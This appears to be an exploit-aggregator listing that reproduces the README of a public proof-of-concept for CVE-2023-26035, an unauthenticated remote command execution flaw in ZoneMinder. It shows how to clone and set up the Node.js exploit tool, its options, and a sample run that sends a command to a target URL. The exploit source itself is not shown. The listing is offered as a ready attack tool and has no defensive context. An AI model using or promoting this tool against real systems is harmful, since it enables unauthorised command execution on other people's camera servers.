Share
## https://sploitus.com/exploit?id=468818B4-DCA4-5D31-85EE-089529AA6813
# CVE-2023-26035
ZoneMinder Snapshots - Unauthenticated
![image](https://github.com/Yuma-Tsushima07/CVE-2023-26035/assets/63207324/c4666544-871c-496b-8b35-6011a0f36e96)
![image](https://github.com/Yuma-Tsushima07/CVE-2023-26035/assets/63207324/798ca08e-95bc-433e-8862-d9bca4560f05)

## Install
**Grab Repo**
```bash
$ git clone https://github.com/Yuma-Tsushima07/CVE-2023-26035.git
```

**Setup**
> Note: Install the latest version of `node`
```bash
$ npm init
$ npm i axios cheerio yargs
```

## Usage
```
โ”Œโ”€[โœ—]โ”€[v37r1x@7h3B14ckKn1gh75]โ”€[~/Documents/Code/CVE-2023-26035]
โ””โ”€โ”€โ•ผ $node exp.js -h
Options:
      --version  Show version number                                   [boolean]
  -t, --target   Target URI (e.g., http://example.com/zm/)   [string] [required]
  -c, --cmd      Command to execute on the target            [string] [required]
  -h, --help     Show help                                             [boolean]
```
```
โ”Œโ”€[v37r1x@7h3B14ckKn1gh75]โ”€[~/Documents/Code/CVE-2023-26035]
โ””โ”€โ”€โ•ผ $node exp.js -t http://127.0.0.1:8888/ --cmd '<shell>'
```

## Credits

- [rvizx](https://github.com/rvizx/CVE-2023-26035)